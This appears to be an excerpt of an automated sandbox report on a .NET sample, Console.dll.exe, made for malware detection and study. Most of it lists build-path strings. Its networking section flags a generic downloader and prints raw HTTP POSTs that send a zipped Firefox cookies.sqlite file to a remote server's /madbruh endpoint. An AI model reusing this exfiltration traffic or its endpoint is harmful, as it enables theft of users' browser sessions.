            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.Net.Security.ni.pdb= source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb^ source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: Microsoft.CSharp.ni.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: System.Text.Encodings.Web.ni.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdbSHA256 source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Collections.Concurrent.ni.pdb source: Console.dll.exe
            Source: Binary string: C:\projects\websocket-sharp\websocket-sharp\obj\Release\netstandard2.0\websocket-sharp.pdb source: Console.dll.exe, 00000000.00000002.1629988218.0000000009582000.00000002.00000001.01000000.00000011.sdmp, Console.dll.exe, 00000007.00000002.2002778673.00000000091D2000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: System.Diagnostics.Process.ni.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Private.Uri.ni.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdbSHA256^ source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdb source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net8.0-windows\Microsoft.VisualBasic.Core.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdb source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdbSHA256 source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdbSHA256 source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256;s source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.Linq.Expressions.ni.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Console.dll.exe
            Source: Binary string: System.Memory.ni.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdb source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: System.IO.Compression.ni.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdb source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: System.Security.Cryptography.ni.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdbSHA256U source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdbSHA256| source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.ComponentModel.TypeConverter.ni.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb; source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256CM source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: System.Console.ni.pdbP source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Net.WebSockets.ni.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256o source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Console.ni.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdbSHA256 source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb; source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: System.Net.Http.ni.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Memory.ni.pdbc source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: Console.dll.exe, System.Buffers.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdbSHA256 source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdbSHA256 source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdb source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdbSHA256 source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp

            Networking

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 3000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 3000
            Yara detected Generic Downloader
            Source: Yara matchFile source: 0.2.Console.dll.exe.95c0000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Console.dll.exe.9210000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dll, type: DROPPED
            Source: global trafficTCP traffic: 192.168.2.7:49723 -> 178.23.190.70:3000
            Source: global trafficHTTP traffic detected: POST /madbruh HTTP/1.1Host: 178.23.190.70:3000Content-Type: multipart/form-data; boundary="cf72a99c-b923-4f30-8451-720f2653c718"Content-Length: 942Data Raw: 2d 2d 63 66 37 32 61 39 39 63 2d 62 39 32 33 2d 34 66 33 30 2d 38 34 35 31 2d 37 32 30 66 32 36 35 33 63 37 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 38 37 38 34 39 20 2d 20 46 49 52 45 46 4f 58 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 38 37 38 34 39 25 32 30 2d 25 32 30 46 49 52 45 46 4f 58 2e 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 ed d3 4d 8b d3 40 18 00 e0 b4 2b 2a a2 e7 bd 0e ec 41 85 22 8a 78 b7 ab 51 8b b5 d5 7e 80 9e 96 58 a3 1b ed 36 dd 24 f5 0b c4 05 c1 ff e5 3f f0 9f 78 f5 68 ba ee 2e 55 17 bd e9 c1 e7 81 19 66 e6 1d 26 6f de 4c 86 0f ba 59 95 86 a7 79 b1 93 54 e1 6a b4 17 35 9b d1 f5 10 a2 28 5a 3b 68 87 1a 75 3b f1 d3 fc ec ca fc 38 6b d1 a5 e7 9f cf bd ff 1a 35 df 7d 89 de 7d 79 ff e9 0f fb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 96 0f fd c6 a9 f5 8d 8d c6 c7 b4 4a 1e 4f d3 9d fc ed d6 24 cf 5f 64 69 b9 32 6c de 18 c4 ed 51 1c 46 ed cd 6e 1c 56 02 e1 42 f6 24 74 7a a3 f8 76 3c 08 f7 07 9d 7b ed c1 a3 70 37 7e d4 0a 79 91 3d cb 66 ed aa 2a b2 c7 8b aa de 39 8a 1f 8e 42 af 5f b7 71 b7 1b 6e c6 b7 da e3 ee 28 9c 3f df 0a b3 64 27 dd 0f b7 c2 cb 64 ba 38 1c 6f e7 65 75 30 9c 27 d5 f6 c1 30 7d 3d cf 8a 37 87 cf 6c 85 69 52 56 ed c9 24 2d cb f4 28 93 56 98 14 69 52 65 f9 6c 94 d5 47 1f ad 66 e5 30 9d 2c 8a 1f 56 ee 54 d5 bc 3f 9b ae 9c 98 cd 36 8b fc 55 99 16 71 5d 8e 74 56 1d bd df 61 ce 97 5b a1 ac 53 1e 66 55 7a 5c ac 48 5e 0d 7f 13 2e 27 db f5 b1 f7 92 f9 71 c1 1b fd de 70 34 68 d7 91 fd 2a 2f 66 d9 ee 22 ad 4b 3c ee 75 1e 8c e3 70 61 59 aa ef 95 f9 5e 94 5f eb 7c f1 e2 b5 e6 c9 f5 ce 46 23 ca 66 4f d2 d7 e5 ee b4 ce 63 2b 59 54 f9 fe 7c 6b e5 e3 6d 5d 59 99 ac d5 77 e1 f4 f2 42 9c 5b 76 7b 7e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 6f 67 96 dd de bf ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe ad 6f 50 4b 01 02 14 00 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 50 4b 05 06 00 00 00 00 01 00 01 00 55 00 00 00 53 02 00 00 00 00 0d 0a 2d 2d 63 66 37 32 61 39 39 63 2d 62 39 32 33 2d 34 66 33 30 2d 38 34 35 31 2d 37 32 30 66 32 36 35 33 63 37 31 38 2d 2d 0d 0a Data As
            Source: global trafficHTTP traffic detected: POST /madbruh HTTP/1.1Host: 178.23.190.70:3000Content-Type: multipart/form-data; boundary="2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9"Content-Length: 942Data Raw: 2d 2d 32 65 64 36 63 39 63 32 2d 64 35 65 63 2d 34 66 32 32 2d 61 66 33 34 2d 66 34 66 32 35 34 37 64 34 38 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 38 37 38 34 39 20 2d 20 46 49 52 45 46 4f 58 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 38 37 38 34 39 25 32 30 2d 25 32 30 46 49 52 45 46 4f 58 2e 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 ed d3 4d 8b d3 40 18 00 e0 b4 2b 2a a2 e7 bd 0e ec 41 85 22 8a 78 b7 ab 51 8b b5 d5 7e 80 9e 96 58 a3 1b ed 36 dd 24 f5 0b c4 05 c1 ff e5 3f f0 9f 78 f5 68 ba ee 2e 55 17 bd e9 c1 e7 81 19 66 e6 1d 26 6f de 4c 86 0f ba 59 95 86 a7 79 b1 93 54 e1 6a b4 17 35 9b d1 f5 10 a2 28 5a 3b 68 87 1a 75 3b f1 d3 fc ec ca fc 38 6b d1 a5 e7 9f cf bd ff 1a 35 df 7d 89 de 7d 79 ff e9 0f fb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 96 0f fd c6 a9 f5 8d 8d c6 c7 b4 4a 1e 4f d3 9d fc ed d6 24 cf 5f 64 69 b9 32 6c de 18 c4 ed 51 1c 46 ed cd 6e 1c 56 02 e1 42 f6 24 74 7a a3 f8 76 3c 08 f7 07 9d 7b ed c1 a3 70 37 7e d4 0a 79 91 3d cb 66 ed aa 2a b2 c7 8b aa de 39 8a 1f 8e 42 af 5f b7 71 b7 1b 6e c6 b7 da e3 ee 28 9c 3f df 0a b3 64 27 dd 0f b7 c2 cb 64 ba 38 1c 6f e7 65 75 30 9c 27 d5 f6 c1 30 7d 3d cf 8a 37 87 cf 6c 85 69 52 56 ed c9 24 2d cb f4 28 93 56 98 14 69 52 65 f9 6c 94 d5 47 1f ad 66 e5 30 9d 2c 8a 1f 56 ee 54 d5 bc 3f 9b ae 9c 98 cd 36 8b fc 55 99 16 71 5d 8e 74 56 1d bd df 61 ce 97 5b a1 ac 53 1e 66 55 7a 5c ac 48 5e 0d 7f 13 2e 27 db f5 b1 f7 92 f9 71 c1 1b fd de 70 34 68 d7 91 fd 2a 2f 66 d9 ee 22 ad 4b 3c ee 75 1e 8c e3 70 61 59 aa ef 95 f9 5e 94 5f eb 7c f1 e2 b5 e6 c9 f5 ce 46 23 ca 66 4f d2 d7 e5 ee b4 ce 63 2b 59 54 f9 fe 7c 6b e5 e3 6d 5d 59 99 ac d5 77 e1 f4 f2 42 9c 5b 76 7b 7e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 6f 67 96 dd de bf ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe ad 6f 50 4b 01 02 14 00 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 50 4b 05 06 00 00 00 00 01 00 01 00 55 00 00 00 53 02 00 00 00 00 0d 0a 2d 2d 32 65 64 36 63 39 63 32 2d 64 35 65 63 2d 34 66 32 32 2d 61 66 33 34 2d 66 34 66 32 35 34 37 64 34 38 63 39 2d 2d 0d 0a Data As
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknownTCP traffic detected without corresponding DNS query: 178.23.190.70
